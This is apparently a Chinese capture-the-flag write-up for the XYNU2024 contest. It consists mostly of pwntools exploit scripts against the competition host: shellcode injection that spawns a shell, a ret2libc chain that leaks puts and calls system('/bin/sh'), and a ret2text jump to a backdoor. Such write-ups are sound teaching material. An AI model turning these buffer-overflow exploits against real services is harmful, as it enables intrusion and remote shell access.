XYNU2024信安杯

全是简单题目，直接上exp

NC

直接nc连接，然后ls+cat flag即可。

shellcode

from pwn import*
context.arch='amd64'
io=remote('gz.imxbt.cn',20029)

shellcode=asm(shellcraft.sh())
io.sendline(shellcode)

io.interactive()

ret2libc

from pwn import*
elf=ELF('./ezret2libc')
libc=ELF('./libc.so.6')
io=remote('gz.imxbt.cn',20030)

puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.sym['main']

rdi=0x0401209
ret=0x040101a

payload=cyclic(0x70+8)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
io.sendline(payload)
puts=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts))

libc_base=puts-libc.sym['puts']
system=libc_base+libc.sym['system']
bin_sh=libc_base+next(libc.search('/bin/sh'))

payload=cyclic(0x70+8)+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system)+p64(main)
io.sendline(payload)

io.interactive()

ret2text

from pwn import*
io=remote('gz.imxbt.cn',20033)

backdoor=0x401200
ret=0x40101a

payload=cyclic(0x8+8)+p64(ret)+p64(backdoor)
io.sendline(payload)

io.interactive()